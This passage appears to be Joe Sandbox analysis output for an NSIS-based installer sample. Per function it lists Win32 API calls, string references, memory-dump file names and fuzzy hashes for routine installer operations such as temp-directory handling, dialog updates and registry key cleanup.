SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040678E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,75573420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
CharNextW.USER32(?,00000000,75573420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
CharPrevW.USER32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040678F
*?|<>/":, xrefs: 004067E0

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2246974252
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E1E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
GetMessagePos.USER32 ref: 00404E41
ScreenToClient.USER32(?,?), ref: 00404E5B
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93

Strings

f, xrefs: 00404E6F

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 39da0b83e90955b658913b401ee9b713f1841a36fe6a8bad0240d4c742fa7cb5
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: E9018C72A0021DBADB00DBA4CD81FFEBBB8AF55710F10002BBA51B61C0C7B49A018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32(00009E00,00000064,000C7F52), ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32(?,?), ref: 00402FFC
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
Instruction ID: 6e758109fa8cded6d2ea51641b68a6ee4e1df044416b280c1a6c4c5bd582b841
Opcode Fuzzy Hash: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
Instruction Fuzzy Hash: B1014F7164020DABEF609F60DE4ABEA3B69FB00345F008039FA06B51D1DBB999559F58

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
Instruction ID: f067c9a989b14af8d706ebefa04c24d1529afff37e35bb6a261b9bb9a52bb1c4
Opcode Fuzzy Hash: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
Instruction Fuzzy Hash: 71318F71D01114BBCF216FA5CE49D9EBE79EF09364F14023AF550762E0CB794D429B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405A38 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
GetLastError.KERNEL32 ref: 00405A8F
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
GetLastError.KERNEL32 ref: 00405AAE

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5E

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-4083868402
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction ID: cc42e232b24e5cb949d5075bafdc516cc04fbeb950a3b4618317dae0e566d145
Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction Fuzzy Hash: F3216B7150010ABBDF11AF90CE89EEF7B7DEB50384F100076F909B21E1D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
Instruction ID: 2ec253bf93b3ee2af7d9c2e9edfaee5893d577595a7c220e34a49f748079806b
Opcode Fuzzy Hash: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
Instruction Fuzzy Hash: 9F212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743

CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: 02c220045fa4ce37a47a4a385f421aa4e4c5bbcd39f6b6b3310c1ad1e6cfa2ab
Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
Opcode Fuzzy Hash: 02c220045fa4ce37a47a4a385f421aa4e4c5bbcd39f6b6b3310c1ad1e6cfa2ab
Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
wsprintfW.USER32 ref: 00404DBA
SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD

Strings

%u.%u%s%s, xrefs: 00404D9B

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: cb7f8dab6708f5147347d1028f1fb4ade6693c058ac397d9bbab0fb1ec6fa22d
Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
Opcode Fuzzy Hash: cb7f8dab6708f5147347d1028f1fb4ade6693c058ac397d9bbab0fb1ec6fa22d
Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8

Uniqueness

Uniqueness Score: -1.00%

Function 00405EDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514

Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC

lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F37
GetFileAttributesW.KERNEL32(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 00405F47

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405EDE
4Wu, xrefs: 00405EE0

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 4Wu$C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3057243036
Opcode ID: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
Instruction ID: 801aa802fb238c59ad0d4c26bfab73d63669863fdcce98965586ad3d6a32a901
Opcode Fuzzy Hash: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
Instruction Fuzzy Hash: CCF0D135105D6226D622333A9C09AAF1508CF82364B5A053FBCD1B22D1DF3C8A53DDBE

Uniqueness

Uniqueness Score: -1.00%

Function 00405DD6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DDC
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DE6
lstrcatW.KERNEL32(?,0040A014), ref: 00405DF8

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DD6

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
